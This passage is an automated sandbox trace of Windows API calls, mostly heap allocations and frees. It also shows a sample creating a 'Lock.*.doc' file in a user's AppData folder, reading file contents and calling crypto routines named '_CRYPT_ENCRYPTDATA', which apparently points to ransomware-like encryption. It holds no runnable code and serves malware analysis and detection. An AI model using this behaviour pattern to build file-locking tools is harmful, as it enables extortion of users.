1 [0231.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0231.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0231.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e56588 [0231.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0231.185] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0231.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0231.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0231.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0231.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04810 [0231.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0231.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0231.188] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.FpHVdISbKXY46o.doc" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.fphvdisbkxy46o.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0231.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0231.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0231.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0231.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0231.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0231.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0231.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0231.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0231.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0231.189] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0231.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0231.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0231.189] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0231.189] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0231.190] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0231.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0231.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0231.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0231.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0231.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0231.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0231.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0231.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0231.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0231.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0231.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0231.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0231.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0231.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0231.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe5b020 [0231.194] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0231.194] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0xad28, lpOverlapped=0x0) returned 1 [0231.197] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0231.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0231.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0231.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0231.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0231.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xad28) returned 0x2f14818 [0231.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5b020 | out: hHeap=0x970000) returned 1 [0231.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0231.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0231.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0231.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0231.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0231.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0231.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0231.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0231.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xad28) returned 0x2f1f548 [0231.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0231.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0231.290] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0231.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0231.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0231.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0231.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0231.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xad28) returned 0x2f14818 [0231.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0231.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0231.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0231.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0231.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0231.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0231.291] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0231.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0231.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0231.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0231.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0231.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0231.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0231.291] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0231.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0231.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0231.291] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0231.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0231.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0231.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0231.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ca8 [0231.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0231.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0231.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0231.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0231.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xad28) returned 0x2f14818 [0231.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0231.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54dc8 [0231.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0231.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0231.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0231.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54fc8 [0231.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0231.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0231.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0231.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f88 [0231.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0231.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0231.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0231.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e18 [0231.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0231.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0231.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0231.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0231.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0231.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xad28) returned 0x2f2a278 [0231.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0231.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0231.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0231.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0231.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0231.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0231.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0231.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0231.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0231.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0231.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4b8 [0231.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0231.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0231.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0231.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0231.294] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0231.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0231.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0231.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0231.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0231.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0231.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0231.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0231.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0231.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0231.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0231.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0231.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0231.295] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0231.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0231.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0231.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0231.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0231.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0231.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0231.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0231.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0231.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0231.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0231.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0231.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0231.296] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0231.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0231.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0231.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0231.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0231.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0231.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0231.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0231.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0231.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0231.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0231.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0231.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0231.296] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0231.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0231.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0231.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0231.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0231.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0231.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0231.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0231.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0231.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0231.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0231.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0231.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0231.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0231.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0231.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0231.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0231.297] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0231.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0231.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0231.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0231.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0231.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0231.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0231.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0231.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0231.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0231.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0231.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0231.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0231.298] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0231.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0231.298] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0231.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f828 | out: hHeap=0x970000) returned 1 [0231.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0231.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51118 [0231.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0231.298] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0231.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0231.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04658 [0231.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0231.298] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0231.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04658 | out: hHeap=0x970000) returned 1 [0231.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0231.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512b0 [0231.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0231.299] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0231.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0231.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0231.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0231.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0231.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0231.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0231.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0231.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0231.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0231.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 